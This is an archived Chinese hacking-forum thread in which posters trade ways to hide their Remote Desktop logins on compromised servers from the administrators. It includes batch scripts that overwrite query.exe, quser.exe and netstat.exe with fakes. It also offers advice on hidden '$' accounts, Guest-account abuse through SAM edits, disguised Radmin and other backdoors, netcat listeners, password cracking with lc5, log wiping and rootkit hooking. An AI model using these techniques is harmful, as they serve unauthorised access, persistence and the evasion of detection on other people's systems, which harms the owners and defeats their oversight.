Board logo

标题: [讨论]如何隐藏3389登陆用户 [打印本页]
作者: s37su37    时间: 2008-7-20 23:17     标题: [讨论]如何隐藏3389登陆用户

[讨论]如何隐藏3389登陆用户
议题作者:huffery
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

经常需要通过3389服务登陆肉鸡,作一些事情。这样在任务管理器里面可以发现
当前登陆的用户。虽然是克隆帐户,显示的是被克隆的用户。这样也不够好。
管理员发现会怀疑的。不知谁思考过这个问题,或者有解决的方法。大家讨论讨论
帖子15 精华4 积分79 阅读权限40 在线时间35 小时 注册时间2005-7-17 最后登录2008-1-28 查看详细资料引用 报告 回复 TOP 爱要怎么说出口


hshack
晶莹剔透§烈日灼然
作者: 我为车狂    时间: 2008-7-20 23:17

那你就直接破解管理员密码。与管理员同用一个帐户。这样任务管理器里看到的就是他自己了。
不管怎么样只要你登陆终端。。第一 。连接是有的。除非你可以复用端口
第二。终端连接管理器也是可以看到的。
你应该说如何不让管理员发现哦。。克隆也只是起到一个隐藏的作用。当你建立连接的时候想不被发现有点不大可能。不过有几个人天天看。
直接留个好点的后门好了。。。
帖子4 精华0 积分22 阅读权限40 在线时间0 小时 注册时间2006-5-6 最后登录2007-3-3 查看详细资料引用 报告 回复 TOP 赚更多的钱

yyb1813
晶莹剔透§烈日灼然
作者: 喂食猫    时间: 2008-7-20 23:17

我的做法直接替换他的文件 query.exe
让他根本就不显示,用记事本做一个文件另存为exe

一个假的query.exe
不管我们用什么办法安装终端 怎么隐藏安装的痕迹
当管理员命令行运行query user的时候 一切就暴露了
将query.exe COPY 到肉机system32下 替换正版query.exe
这样 管理员运行query user 就会出现
[这个工具需要运行终端服务。]
将终端服务更好的隐藏起来


==========================

@echo off
@del c:\winn\system32\query.exe
@del c:\winnt\system32\dllcache\query.exe
@del c:\winn\system32\quser.exe
@del c:\winnt\system32\dllcache\quser.exe
@copy c:\winnt\query.exe c:\winnt\system32\query.exe
@copy c:\winnt\quser.exe c:\winnt\system32\quser.exe

批处理两个文件,如果对方没开终端可以用que.exe代替,装过终端的话用其它同名文件替换就可以了。但注意的是出现替换系统文件时按取消保留,然后确定替换!


@echo off
@del c:\winn\system32\query.exe
@del c:\winnt\system32\dllcache\query.exe
@del c:\winn\system32\quser.exe
@del c:\winnt\system32\dllcache\quser.exe
@copy c:\winnt\que.exe c:\winnt\system32\query.exe
@copy c:\winnt\que.exe c:\winnt\system32\quser.exe
==========
@echo off
@del c:\winn\system32\netstat.exe
@del c:\winnt\system32\dllcache\netstat.exe
@del C:\WINNT\ServicePackFiles\i386\netstat.exe
@copy c:\winnt\query.exe c:\winnt\system32\netstat.exe
帖子66 精华0 积分209 阅读权限40 在线时间46 小时 注册时间2006-1-19 最后登录2008-7-12 查看详细资料引用 报告 回复 TOP 您知道您年薪应是多少?

dingking
荣誉会员
作者: 风的方向    时间: 2008-7-20 23:17

直接运行 tsadmin 就可以看到用户登陆。不一定要用 query 。
所以最好把 tsadmin 也修改了。昨天是明天的前天今天是昨天的明天明天是昨天的后天    ╰o╯╰o╯
帖子741 精华2 积分4784 阅读权限100 性别男 在线时间756 小时 注册时间2005-6-17 最后登录2008-7-18 查看详细资料引用 报告 回复 TOP

iskilo
晶莹剔透§烈日灼然
作者: 天下无敌    时间: 2008-7-20 23:17

这一些可以还要破解查询入口,用API-HOOK来实现用户隐藏。
帖子20 精华0 积分54 阅读权限40 在线时间33 小时 注册时间2005-7-19 最后登录2008-2-9 查看详细资料引用 报告 回复 TOP 良辰择日,预测咨询,公司改名,权威易经

st285
晶莹剔透§烈日灼然
作者: 天下无敌    时间: 2008-7-20 23:17

不是说用net user st285$ 123456 /add.就是在帐号后面加个"$"这样用net user都查不出来.然后去C:\Documents and Settings\All Users或者C:\Documents and Settings\Administrator下面把以你的帐号命名的文件夹属性改成隐藏不就可以瞒天过海拉?

帖子72 精华0 积分127 阅读权限40 性别男 在线时间39 小时 注册时间2006-2-8 最后登录2008-7-18 查看个人网站
查看详细资料引用 报告 回复 TOP 良辰择日,预测咨询,公司改名,权威易经

网虫qqq
晶莹剔透§烈日灼然
作者: NSX    时间: 2008-7-20 23:17

@echo off
@del c:\winn\system32\query.exe
@del c:\winnt\system32\dllcache\query.exe
@del c:\winn\system32\quser.exe
@del c:\winnt\system32\dllcache\quser.exe
@copy c:\winnt\query.exe c:\winnt\system32\query.exe
@copy c:\winnt\quser.exe c:\winnt\system32\quser.exe


  这样的代码怎么运行?
帖子7 精华0 积分51 阅读权限40 在线时间15 小时 注册时间2006-8-5 最后登录2008-7-7 查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味

zhuixun2006
晶莹剔透§烈日灼然
作者: yemao4587    时间: 2008-7-20 23:17

引用:
这里是引用第[7 楼]的网虫qqq于2006-08-05 14:25发表的:
@echo off
@del c:winnsystem32query.exe
@del c:winntsystem32dllcachequery.exe
@del c:winnsystem32quser.exe
@del c:winntsystem32dllcachequser.exe
.......
你得先把假的query.exe复制到指定的目录,然后进行替换。
不过,管理员还是可以在终端的管理里面看见你在线的。http://Zhuixun.A.gg 我的BOLG
帖子60 精华0 积分116 阅读权限40 性别男 在线时间38 小时 注册时间2006-5-6 最后登录2006-10-21 查看详细资料引用 报告 回复 TOP

antiblue
晶莹剔透§烈日灼然
作者: powerfive    时间: 2008-7-20 23:17

要我说 3389还是比较容易被发现 装个后门不错 把Radmin打造一下 做个假的服务 还是很好用的
帖子6 精华0 积分23 阅读权限40 在线时间17 小时 注册时间2005-11-14 最后登录2008-7-16 查看详细资料引用 报告 回复 TOP

webmaster
晶莹剔透§烈日灼然
作者: =wayne=    时间: 2008-7-20 23:17

就目前而言,如果你要对电脑进行操作,最好还是用3389,radmin类似于一个合法木马,你在操作时,肉鸡管理员看到鼠标乱窜,不被吓坏才奇怪哦。
3389一般来说还是够用了。
有一楼的朋友说跟管理员用一个同样的账户就不会被发现,其实不然,如果你和管理员都用的时候一个账户,如administrator,在任务管理器里面会出现两个相同账户的运行记录的。请多赐教!谢谢!

帖子3 精华0 积分13 阅读权限40 性别男 在线时间7 小时 注册时间2006-8-11 最后登录2006-10-18 查看详细资料引用 报告 回复 TOP

小猴哥
荣誉会员
作者: paul    时间: 2008-7-20 23:17

用黑客之门+radmin就够了,一般情况下3389还是好用,但是一般不太容易被发现,哪个SB管理员天天趴服务器上看谁上线,除非你命背或者日志记录,记的用工具清除!
帖子16 精华0 积分24 阅读权限100 在线时间16 小时 注册时间2005-11-3 最后登录2008-6-15 查看详细资料引用 报告 回复 TOP

dingsy
晶莹剔透§烈日灼然
作者: 佳仔    时间: 2008-7-20 23:17

你说的这问题好象只有2003才会出现吧
帖子14 精华0 积分48 阅读权限40 在线时间15 小时 注册时间2005-2-3 最后登录2008-1-8 查看详细资料引用 报告 回复 TOP

huffery
晶莹剔透§烈日灼然
作者: XYFHID    时间: 2008-7-20 23:17

上面许多人都没有明白我的问题. 就是管理员能够发现有其他人登陆.
不是隐藏用户名的问题.
任务管理器/ - 用户,就可以看到拉.
我想这应该是将来写rootkit要考虑的. 要hook一些涵数吧..
3389确实好用,而且服务器机器比你自己要好的多, 又是外网, 独立IP
BT下载nM每秒, 作为跳板, 作为反弹后门主机..........
帖子15 精华4 积分79 阅读权限40 在线时间35 小时 注册时间2005-7-17 最后登录2008-1-28 查看详细资料引用 报告 回复 TOP

testplay
晶莹剔透§烈日灼然
作者: auqa    时间: 2008-7-20 23:17

你所要求的东西太难,你都连上去了,要躲过他人的眼睛不是那么容易. 换个方法来解决当前的困惑.
很多事情不一定要用终端图形来操作,锻炼在shell下操作的能力,既能隐藏行踪,又能让对方服务器少耗资源.
关于bt,你的问题在于需要长时间连接终端.那先登陆,选择好你要下载的东西,并配制bt工具为启动继续先前任务退出终端,进入自己安装的shell后门(system权限),start bt程序.这样不就能下载了?而你又能自行退出shell,不留IP没有用户登陆,没有长连接存在.
关于反弹溢出的程序,可以打开对方telnet啊,t上去就象本地cmd一样稳定,来个nc监听.
帖子26 精华0 积分93 阅读权限40 在线时间25 小时 注册时间2005-1-27 最后登录2008-2-2 查看详细资料引用 报告 回复 TOP

cnhcerkf
运维管理组
作者: langchen    时间: 2008-7-20 23:17

我感觉可以放个小马的哈,或者用lake2的sqlshell。很不错的选择。
如果想长期保留,还可以新建立用户,半夜登陆。。跑个lc5,嘿嘿,把他psw跑出来就OK了。。珍爱生命,潜心修炼,早日成仙。
帖子374 精华2 积分3971 阅读权限150 性别男 在线时间708 小时 注册时间2006-8-27 最后登录2008-7-6 查看详细资料引用 报告 回复 TOP

liu830219
晶莹剔透§烈日灼然
作者: XIELLP    时间: 2008-7-20 23:17

装一些小后门比如nameNameLess 既可以正向连又可以反向连.每次想连3389的时候先看看管理员在不在线.哪位高手也可以写个程序监视有没有人连上来的,一但有人连上服务器就报警.
帖子12 精华0 积分38 阅读权限40 性别男 在线时间52 小时 注册时间2006-8-3 最后登录2008-7-1 查看详细资料引用 报告 回复 TOP

infofly
晶莹剔透§烈日灼然
作者: 草本刚    时间: 2008-7-20 23:17

想问下,专业版2k怎么转server版,以前看到过一个小东西。现在不见了。
帖子22 精华0 积分50 阅读权限40 在线时间32 小时 注册时间2006-8-13 最后登录2008-7-11 查看详细资料引用 报告 回复 TOP

跟着感觉走
晶莹剔透§烈日灼然
作者: 车BB    时间: 2008-7-20 23:17

引用:
这里是引用第[18 楼]的infofly于2006-08-28 04:38发表的:
想问下,专业版2k怎么转server版,以前看到过一个小东西。现在不见了。
---------------再次安装选升级就可以了,是在2003 server企业版下可以实现,其他的不清楚。
帖子19 精华0 积分27 阅读权限40 在线时间0 小时 注册时间2005-10-29 最后登录2007-11-2 查看详细资料引用 报告 回复 TOP

寂寞宝贝
荣誉会员
作者: 非法操作    时间: 2008-7-20 23:17

不管你怎么隐藏,打开注册表编辑器的RAM项,全部暴光!成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。

帖子428 精华12 积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16 查看个人网站
查看详细资料引用 报告 回复 TOP

tveo
晶莹剔透§烈日灼然
作者: ming312    时间: 2008-7-20 23:17

引用:
这里是引用第[18 楼]的infofly于2006-08-28 04:38发表的:
想问下,专业版2k怎么转server版,以前看到过一个小东西。现在不见了。
NTSwitch
帖子1 精华0 积分6 阅读权限40 在线时间35 小时 注册时间2005-1-12 最后登录2007-12-7 查看详细资料引用 报告 回复 TOP

iskilo
晶莹剔透§烈日灼然
作者: 纯银    时间: 2008-7-20 23:17

引用:
这里是引用第[18 楼]的infofly于2006-08-28 04:38发表的:
想问下,专业版2k怎么转server版,以前看到过一个小东西。现在不见了。
NTSWITCH可以实现你要做功能,具体程序我已经实现有机会再上传吧。我现在在这里权限很低,如果有空到红狼或者狼族上找PEGRE,索要该工具。
帖子20 精华0 积分54 阅读权限40 在线时间33 小时 注册时间2005-7-19 最后登录2008-2-9 查看详细资料引用 报告 回复 TOP

zhuwg
运维管理组
作者: jilang    时间: 2008-7-20 23:17

引用:
这里是引用第[18 楼]的infofly于2006-08-28 04:38发表的:
想问下,专业版2k怎么转server版,以前看到过一个小东西。现在不见了。
NTSwitch

This program will change the operating system type on your computer.
附件
NTSwitch.rar (108 KB)
2006-9-1 19:30, 下载次数: 164 Heaven is a place nearby so I won't be so far away and if you try and look for me maybe you'll find me someday
帖子171 精华10 积分3877 阅读权限150 性别男 在线时间257 小时 注册时间2005-12-17 最后登录2008-7-11 查看详细资料引用 报告 回复 TOP

别动我飘着呢
晶莹剔透§烈日灼然
作者: 成哥    时间: 2008-7-20 23:17

隐藏不如换一下断口~~还是这个有实效行偶的烂LOG :http://blog.yesky.com/Blog/yanfeics/

帖子66 精华2 积分158 阅读权限40 性别女 在线时间139 小时 注册时间2006-8-24 最后登录2007-7-5 查看个人网站
查看详细资料引用 报告 回复 TOP

xiaocool
晶莹剔透§烈日灼然
作者: 哑雪    时间: 2008-7-20 23:18

其实直接用他的guest就好,guest表面显示禁用,其实可以用的,你在sam里面替换下就可以了。不过还是可以看出来的,但是比重新建立个隐藏帐户要安全多了。
要是想什么都不显示的话,用远程控制好了。
NCPH好像可以隐藏端口的,你可以试试看。
帖子162 精华2 积分431 阅读权限40 在线时间75 小时 注册时间2005-8-4 最后登录2008-6-9 查看详细资料引用 报告 回复 TOP

黑眼圈sct
荣誉会员




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2